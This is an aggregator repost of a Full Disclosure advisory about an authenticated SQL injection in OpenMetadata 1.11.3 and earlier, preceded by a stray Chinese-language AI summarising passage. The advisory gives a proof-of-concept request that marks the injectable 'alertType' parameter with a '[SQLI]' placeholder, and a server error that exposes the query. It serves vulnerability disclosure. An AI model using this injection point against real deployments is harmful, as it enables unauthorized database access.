OpenMetadata <= 1.11.3 Authenticated SQL Injection
好的,我现在需要帮用户总结一篇文章的内容,控制在100字以内,并且不需要特定的开头。首先,我得仔细阅读用户提供的文章内容。 文章标题是“OpenMetadata <= 1.11.3 Authenticated SQL Injection”,看起来是关于一个安全漏洞的。受影响的版本是1.11.3及以下。漏洞类型是经过身份验证的SQL注入。攻击者可以利用这个漏洞访问数据库,获取未经授权的数据。 接下来,我需要提取关键信息:软件名称、漏洞类型、影响版本、攻击者权限以及可能的影响。然后,把这些信息浓缩成一句话,确保不超过100字。 可能的结构是:“OpenMetadata 1.11.3及以下版本存在经身份验证的SQL注入漏洞,低权限用户可借此获取数据库访问权限。” 这样既涵盖了软件名称、版本、漏洞类型和影响,又简洁明了。 </think> OpenMetadata 1.11.3及以下版本存在经身份验证的SQL注入漏洞,低权限用户可借此获取数据库访问权限。 2026-1-21 20:28:56 Author: seclists.org(查看原文) 阅读量:1 收藏

fulldisclosure logo

Full Disclosure mailing list archives


From: BUG <secbugs3 () gmail com>
Date: Tue, 20 Jan 2026 19:32:37 +0100

#### Title:OpenMetadata <= 1.11.3 Authenticated SQL Injection
#### Affected versions: <= 1.11.3
#### Credits: echo
#### Vendor: https://open-metadata.org/

OpenMetadata versions 1.11.3 and earlier are vulnerable to an authenticated SQL injection issue. Low-privileged users can exploit this vulnerability to gain unauthorized access to the database in the context of the database user associated with the application.

POC:

request:

GET /api/v1/events/subscriptions?limit=15&alertType=Observability'[SQLI] HTTP/1.1/1.1
Host: localhost
Cache-Control: max-age=0
Sec-CH-UA: "Chromium";v="141", "Not;A=Brand";v="24", "Google Chrome";v="141"
Sec-CH-UA-Mobile: ?0
Sec-CH-UA-Platform: "Windows"
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
Accept: application/json, text/plain, /
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Connection: close
Authorization: Bearer [redacted]
Referer [redacted]

response:

HTTP/1.1 500 Server Error
Content-Type: application/json
Content-Length: 562
Connection: close
Date: Thu, 23 Oct 2025 10:38:02 GMT
Strict-Transport-Security: max-age=31536000; includeSubDomains

{"responseMessage":"An exception with message [java.sql.SQLSyntaxErrorException: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''Observability''' at line 1 [statement:"/* EventSubscriptionDAO.listCount */ SELECT count(nameHash) F

-----BEGIN PGP PUBLIC KEY BLOCK-----

xjMEYgzK+BYJKwYBBAHaRw8BAQdAuvqLumsJp8MYs+ccGRDNptLpiXET6kQ4EMSQ
m0+K1kbNGEJVRyA8c2VjYnVnczNAZ21haWwuY29tPsKLBBMWCAAzFiEEVFMxXX78
QbIacMz7MuWgzP7on3UFAmIMyvgCGwMFCwkIBwIGFQgJCgsCBRYCAwEAAAoJEDLl
oMz+6J91RUwBAKYGAZ6fDeCVFckLBYJtAOfapZOkqtxsyPkWH2nI4nOOAP40wwVT
HhF+/KzlydxgZeWSFisfQiG4/gKee8TOfp7LDc44BGIMyvkSCisGAQQBl1UBBQEB
B0Bao5PIrX/c+RguQIRDZ0FRnigzTdRS1970qRbrlxUIBAMBCAfCeAQYFggAIBYh
BFRTMV1+/EGyGnDM+zLloMz+6J91BQJiDMr5AhsMAAoJEDLloMz+6J91OIkA/iS1
KwXlgE28cwK3PyPvNe7Jv5E+HXb3lXVxMe63iKdsAP94dozMMgIPdTHXU8LXxkR/
YPBCvA4bkQ9SA37Ak2UDDg==
=6VCh
-----END PGP PUBLIC KEY BLOCK-----

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/


Current thread:

  • OpenMetadata <= 1.11.3 Authenticated SQL Injection BUG (Jan 21)

文章来源: https://seclists.org/fulldisclosure/2026/Jan/20
如有侵权请联系:admin#unsafe.sh